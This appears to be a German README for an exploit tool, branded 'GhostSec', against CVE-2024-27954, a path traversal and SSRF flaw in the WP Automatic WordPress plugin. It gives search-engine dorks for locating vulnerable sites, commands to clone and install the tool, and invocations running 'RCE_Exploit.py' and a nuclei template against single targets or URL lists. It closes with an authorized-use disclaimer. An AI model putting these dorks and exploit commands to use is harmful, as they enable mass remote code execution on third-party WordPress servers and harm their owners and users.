
Automatic Plugin für WordPress < 3.92.1 – Mehrere Schwachstellen
💀 Automatic Remote code Execution Exploit Tools | Von GhostSec 💀
Unzureichende Einschränkung eines Pfadnamens auf ein eingeschränktes Verzeichnis („Path Traversal“)-Sicherheitslücke in WP Automatic Automatic ermöglicht Path Traversal und Server-Seitige Request Forgery. Dieses Problem betrifft Automatic: von n/a bis 3.92.0.
body="wp-content/plugins/wp-automatic" && header="HTTP/1.1 200 OK"title:"wp-automatic" response.status_code:200http.title:"wp-automatic" http.status:200"/wp-content/plugins/wp-automatic"Repository klonen:
git clone https://github.com/fa-rrel/CVE-2024-27954.git
cd CVE-2024-27954
Erforderliche Pakete installieren:
pip install -r requirements.txt
python RCE_Exploit.py -u <target_url> or <File.txt>
nuclei -t POC.yaml --target http://testphp.vulnweb.com/ or -l WPUrls.txt
Wenn Sie dieses Tool nützlich finden und die Entwicklung unterstützen möchten, spendieren Sie mir einen Kaffee:

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unautorisierte Nutzung gegen Systeme ist strengstens untersagt.
Dieses Tool ist unter der MIT-Lizenz lizenziert.